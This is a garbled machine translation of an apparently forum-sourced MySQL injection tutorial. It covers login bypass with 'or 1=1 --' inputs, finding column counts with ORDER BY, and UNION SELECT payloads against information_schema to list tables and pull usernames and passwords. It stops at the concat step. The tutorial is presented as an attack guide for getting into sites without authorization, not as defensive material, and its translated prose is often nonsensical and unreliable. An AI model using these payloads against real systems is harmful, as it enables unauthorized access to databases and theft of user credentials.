Complete MySQL injection tutorial

Secure-hiphop Space

Someone interested in reading the translation is thrown to Gu Ge

It is only general information. database applications store data collection. Provides APIs for various databases to create, access, and manage their data. And database (DB) servers can develop with our network, so that we can pick up things we want from the database without too many difficulties. The database can hold a variety of important information such as user names, passwords, and credit card concerns. Therefore, the database needs to be secured, but many database servers run insecured or bcoz their vulnerabilities or bcoz poor programming processing. Name several database servers, MySQL (Open Source Code), database, mass spectrometry, transportation, Oracle, Postgre database (Open Source Code), SQLite, etc.

 

What is SQL injection?

SQL injection may be the most abundant programming vulnerability that exists on the Internet. It allows unauthorized users to access various key and private data through its vulnerabilities. SQL injection is not a security vulnerability on Web or database servers, but due to poverty and lack of experience in programming practices. This is a fatal and simple attack that executes from a remote location. In SQL injection, we use various commands of the database server and obtain various data from it. In this guide, I will discuss three aspects of SQL injection, namely bypassing logon, accessing confidential data and modifying webpage content. Therefore, let our heads really roam ..

Bypass Logon

Assume that only registered users can access the logon form of a website. Now, I want to bypass logon and enter Valid users of the website. If the login script is not properly sanitized by the programmer, u may be lucky to enter the website. Ü you can log on to this website without knowing the real user name and password, truly fair and database server, so not beautiful SQL injection!

Let's take a look at an example. The username and password sam207 can be used to log on to the website. Assume that the SQL query is carried out as follows:
Code:
Code: select user from database WHERE username = admin AND password = sam207
If the preceding Command is true, the user will have the opportunity to go to the site. Otherwise, no. Think we can do it if the script is not disinfected. This will open a door where hackers obtain illegal access to the website. In this example, attackers can enter the following user data logon form.
Code: username: a or 1 = 1 -- password: blank
Therefore, this will make our query Code: select user from database WHERE username = a or 1 = 1 -- AND password =
Note that after the operator and any comments, the comments will be ignored. Another comment is the operator/*, so our above query becomes
Code:
Code: select user from database WHERE username = a or 1 = 1
Now, even if no user's so-called a bcoz 1 = 1 is always real and used, or make it a real query, the returned query is true. To enter the website management team. It is impossible to have a variety of other combinations of user names and passwords to play a vulnerable website. Ü you can create your own login name and new combination of the Uruguay Round website, for example, combination
Code: username: or 1 = 1 password: or 1 = 1 username: or 1 = 1 password: or 1 = 1 username: or 1 = 1 password: or 1 = 1
There are more cheat sheets, but Google does bypass login.

Obtain confidential information

SQL Injection does not basically only bypass logon, but it is also used to access database servers with sensitive and confidential information. This part is very long, so I will discuss it in the Section.

Check Security Vulnerabilities

Suppose u got a site as following
Code: www.site.com/article.php? Id = 5
Now to check if it is vulnerable, you wowould simply add in the end I. e. where id variable is assigned, like the following example
Code: www.site.com/article.php? Id = 5
Now, if the website is not easy, its filter and webpage load are normal, but if there is no filter to query strings, it will make errors similar to the following
Code: MySQL Syntax Error By 5 In Article. php on line 15

Or error, indicating that we check the correct MySQL version or the MySQL retrieval error or sometimes only a blank page. This error may take any form. Therefore, it makes us believe that the website is fragile.

Search for columns

So, the current time to find the number of columns, so we will use order until we get the error. This is our website Query
Code:

Code: www.site.com/article.php? Id = 5 order by 1/* // this didnt give error. Now, I do increase it to 2.www.site.com/article.php? Id = 5 order by 2/* // still no error So, we need to increase until we get the error. In my example, I got error when I put the value 3 I .e.www.site.com/article.php? Id = 5 order by 3/* // this gave me error.
So it means there are 2 columns in the current table (3-1 = 2), This is how we find the number of columns.

Addressing Vulnerable Part

Now, we need to use union statement & find the column which we can replace so as to see the secret data on the page.
Code: www.site.com/article.php? Id = 5 union all select 1, 2 /*
Now we will see the number (s) on the page somewhere. I mean, either 1 or 2 or both 1 & 2 are seen on the page. so, this means we can replace the number with our commands to display the private data the DB holds. in my example 1 is seen on the page, this means I shocould replace 1 with my things to proceed further so lets move forward.

Finding MySQL version

For our injection it is necessary to find the MySQL version bcoz if it is 5 our job becomes lot easier, to check the version, there is a function @ version or version (), so what we do is replace 1 (which is the replaceable part) with @ version I. e. we do as below
Code: www.site.com/article.php? Id = 5 union all select @ version, 2 /*
So this wowould return the version of MySQL running on the server but sometimes u may get error with above query, if that is the case do use of unhex (hex () function like this
Code: www.site.com/article.php? Id = union all select unhex (hex (@ version), 2 /*
Remember that if u have to use unhex (hex () function here, u will also have to use this function in the injection process. @ version will give u the version, it may be either 4 or 5 & above. I m now going to discuss the injection process for version 5 and 4 separately coz as I said earlier, version 5 makes it easy for us to perform the injection.

MySQL 5 or above

Here, I m gonna show u how to access data in the server running MySQL 5 or above. U got MySQL version 5.0.27 standard using the @ version in url parameter. mySQL from version 5 has a useful function called information_schema. this is table that holds information about the tables and columns present in the DB server. it contains name of all tables and columns of the site.

For getting table list we use
Code: table_name from information_schema.tables
For getting column list we use
Code: column_name from information_schema.columns
So our query for getting the table list in our example wocould be
Code: www.site.com/article.php? Id = 5 union all select table_name, 2 FROM information_schema.tables /*
And yeah if u had to use unhex (hex () while finding version, you will have to do
Code: www.site.com/article.php? Id = 5 union all select unhex (hex (table_name), 2 FROM information_schema.tables /*
This will list all the tables present in the DB, for our purpose we will be searching for the table containing the user and password information. so we look at the probable table with that information, you can even write down the table names for further reference and works, for my example, I wocould use the tbluser as the table that contains user & password. similarly to get the column list, we wocould make our query
Code: www.site.com/article.php? Id = 5 union all select column_name, 2 FROM information_schema.columns /*
This returns all the columns present in the DB server, Now from this listing we will look for the probable columns for username and password. for my injection there are two columns holding these info. they are username and password respectively so thats the column what I wanted. U have to search and check the columns until u get no error. alternatively to find the column in the specific table u can do something like below
Code: www.site.com/article.php? Id = 5 union all select column_name, 2 FROM information_schema.columns WHERE table_name = tbluser
This wocould display the columns present in the table tbluser but this may not work always. let me show u how I got to know that the above two columns belong to table tbluser, now let me show how to display the username and password stored in the DB.

There is a function called concat () that allows me to join the two columns and display on the page also I will be using (colon) in the hex form, its hex value is 0x3a (thats zero at beginning not alphabet o) and what I do is the following